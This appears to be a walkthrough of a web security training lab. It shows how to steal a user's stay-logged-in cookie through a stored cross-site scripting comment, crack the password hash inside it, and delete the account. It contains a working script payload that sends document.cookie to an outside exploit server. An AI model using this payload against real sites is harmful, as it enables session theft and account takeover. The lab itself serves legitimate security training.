This lab is in the same series than the previous article. The goal here to steal Carlos’s “stay-logged-in” cookie to steal and delete his account.
Lab: Offline password cracking
Click “My account button”
![offline-password-cracking-1.png]()
Enter Wiener’s credentials, click “stay-logged-in” option and click “Log in”
![offline-password-cracking- (2).png]()
In Proxy > HTTP History, click the the GET reset “/my-account” and click on the arrow on the “stay-logged-in” cookie
![offline-password-cracking-3.png]()
The base64 string is decoded:
username:passwordO![offline-password-cracking-4.png]()
Click “Home”
![offline-password-cracking-5.png]()
Click a “View post” button
![offline-password-cracking-6.png]()
In another tab, open the Exploit Server
![offline-password-cracking-7.png]()
Copy its URL
![offline-password-cracking-8.png]()
On the post opened at step 6, bottom page, add the following payload (change the URL for your exploit server), as well as random name, email address and website URL. Then click “Post comment”:
<script>document.location='https://exploit-server-url.com'+document.cookie</script>![offline-password-cracking-9.png]()
Click “Back to blog”
![offline-password-cracking-10.png]()
The blog post will be redirected to a similar page (here on Firefox)
![offline-password-cracking-11).png]()
Go back the the exploit server and click “Access log”
![offline-password-cracking-12.png]()
A GET reset “/exploitserver” appears in the list, containing a “stay-logged-in” cookie, copy its string
![offline-password-cracking-13.png]()
Go to base64decode.org, paste the string previously copied to decode it and copy the hashed password, after “
carlos:”![offline-password-cracking-14.png]()
Go to crackstation.net and paste the hash to get Carlos’s password
![offline-password-cracking-15.png]()
Go back to the lab’s tab and click multiple times on the “Go back” button until you can see the website without being redirected
![offline-password-cracking-16.png]()
If needed, click “My account”, according to the point you have reached using the “Go back” button, and click “Log out”
![offline-password-cracking-17.png]()
Click “My account” again
![offline-password-cracking-18.png]()
Enter “carlos” as a username and the password previously found at step 16 on Crackstation, “onceuponatime”, and click “Log in”
![offline-password-cracking-19.png]()
When you are on Carlos’s “My account” page, click “Delete account”
![offline-password-cracking-20.png]()
Paste one more time his password as a confirmation and click “Delete account!”
![offline-password-cracking-21.png]()
The lab is solved
![offline-password-cracking-22.png]()
